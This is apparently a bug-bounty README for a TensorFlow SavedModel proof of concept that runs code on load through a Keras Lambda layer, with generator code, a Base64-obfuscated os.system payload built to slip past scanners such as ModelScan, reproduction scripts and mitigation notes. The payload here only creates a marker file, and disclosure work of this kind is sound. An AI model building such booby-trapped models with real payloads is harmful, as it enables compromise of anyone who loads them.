# Security Research PoC: TensorFlow SavedModel RCE
⚠️ **WARNING:** This model is a Proof-of-Concept (PoC) for security research purposes only. **DO NOT USE IN PRODUCTION.**
## Description
This repository contains a TensorFlow SavedModel that demonstrates an Arbitrary Code Execution (ACE) vulnerability via Keras Lambda layers. It is intended for submission to the Huntr/Protect AI bug bounty program.
## Vulnerability Details
The model uses a Keras Lambda layer to embed arbitrary Python bytecode. To demonstrate a bypass of static analysis tools such as ModelScan, the payload is obfuscated with Base64 encoding; a minimal generator sketch follows the list below.
- **Payload:** Creates a file at `/tmp/stealth_pwned.txt`.
- **Trigger:** Loading the model via `tf.keras.models.load_model`.
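For context, a model of this shape can be produced with a few lines of Keras. The sketch below is illustrative only and is limited to the benign marker payload used by this PoC; the layer name, input shape, and save path are assumptions, not the exact values used in this repository.

```python
import tensorflow as tf

# Illustrative generator sketch (benign marker payload only).
# The shell command exists solely as a Base64 constant inside the
# marshaled lambda bytecode; it decodes to: touch /tmp/stealth_pwned.txt
payload = lambda x: (
    __import__("os").system(
        __import__("base64")
        .b64decode("dG91Y2ggL3RtcC9zdGVhbHRoX3B3bmVkLnR4dA==")
        .decode()
    ),
    x,  # pass the tensor through so the layer looks like a no-op math step
)[1]

# Layer name, input shape, and save path are hypothetical.
model = tf.keras.Sequential(
    [tf.keras.layers.Lambda(payload, input_shape=(1,), name="custom_math_op")]
)
model.save("poc_model")  # legacy SavedModel: saved_model.pb + variables/
```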
## How to Reproduce (For Triagers)
1. Install TensorFlow:

   ```bash
   pip install tensorflow==2.15.0
   ```

2. Run the following script from the model directory:

   ```python
   import tensorflow as tf
   import os

   # Load the model (simulating a victim loading an untrusted model).
   # safe_mode=False is required for Lambda deserialization.
   print("[*] Loading model...")
   model = tf.keras.models.load_model(".", safe_mode=False)

   # Check for code execution
   if os.path.exists("/tmp/stealth_pwned.txt"):
       print("[!!!] SUCCESS: Arbitrary code executed. /tmp/stealth_pwned.txt created.")
   else:
       print("[?] FAILED: Payload did not execute.")
   ```
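Because merely loading the model executes the payload, reproduction is best done in a disposable environment. A minimal sketch using Docker, assuming the script above is saved as `poc.py` inside the model directory (the image tag simply pins the TensorFlow version used here):

```bash
docker run --rm -v "$PWD":/work -w /work \
    tensorflow/tensorflow:2.15.0 python poc.py
```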
## For the Huntr Submission Form
Copy and paste this into the "Description" or "Vulnerability Details" box on Huntr.
**Title:** Arbitrary Code Execution via Obfuscated Keras Lambda Layer (Bypasses Static Analysis)
**Description:**

I have identified a vulnerability in the TensorFlow SavedModel format where an attacker can embed malicious Python bytecode using a Keras Lambda layer. When a victim loads this model using `tf.keras.models.load_model` (with `safe_mode=False`), the code executes immediately.
**Vulnerability Details:**
The `saved_model.pb` format, when generated by Keras, allows the serialization of arbitrary Python functions within Lambda layers. While `modelscan` and other tools flag the presence of Lambda layers as a "Medium" severity finding, they often fail to inspect the actual bytecode or serialized content effectively.
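Triagers can confirm this first-hand by pointing `modelscan` at the model directory. A sketch using modelscan's documented CLI; the exact finding text varies by scanner version, and the expected result noted below reflects this report's claim:

```bash
pip install modelscan
# Expected per this report: a generic medium-severity "Lambda layer"
# finding, with no visibility into the Base64-wrapped command.
modelscan -p .
```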
I have demonstrated that an attacker can obfuscate the payload (using Base64 encoding) to hide malicious intent (e.g., `os.system` calls) from static analysis tools. This allows a malicious model to pass as a benign model with a custom math operation while actually executing a reverse shell or dropping malware.
**Proof of Concept (PoC):**
- **Repository:** [PASTE YOUR HUGGING FACE URL HERE]
- **Payload:** The model executes a hidden payload that runs `touch /tmp/stealth_pwned.txt`.
- **Obfuscation:** The payload is encoded in Base64 to evade keyword-detection scanners.
**Steps to Reproduce:**
1. Download the model files from the linked repository.
2. Install TensorFlow: `pip install tensorflow==2.15.0`.
3. Run the following Python script:

   ```python
   import tensorflow as tf
   import os

   # Load the downloaded model folder
   model = tf.keras.models.load_model("path_to_model_folder", safe_mode=False)

   if os.path.exists("/tmp/stealth_pwned.txt"):
       print("VULNERABILITY CONFIRMED: Code executed!")
   ```
**Impact:** Arbitrary Code Execution (ACE) on the machine of any user who loads the model. This can lead to full system compromise, data exfiltration, or lateral movement within an organization's AI pipeline.
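Mitigation note: with the default `safe_mode=True`, Keras is expected to refuse to deserialize the marshaled Lambda rather than execute it. A quick check, sketched below (the exact exception type and message vary across Keras/TensorFlow versions):

```python
import tensorflow as tf

try:
    # Default safe_mode=True: deserialization of the marshaled Lambda
    # should be rejected instead of executed.
    tf.keras.models.load_model("path_to_model_folder")
    print("[?] Model loaded -- safe_mode did not block deserialization.")
except Exception as exc:
    print(f"[*] Blocked as expected: {exc}")
```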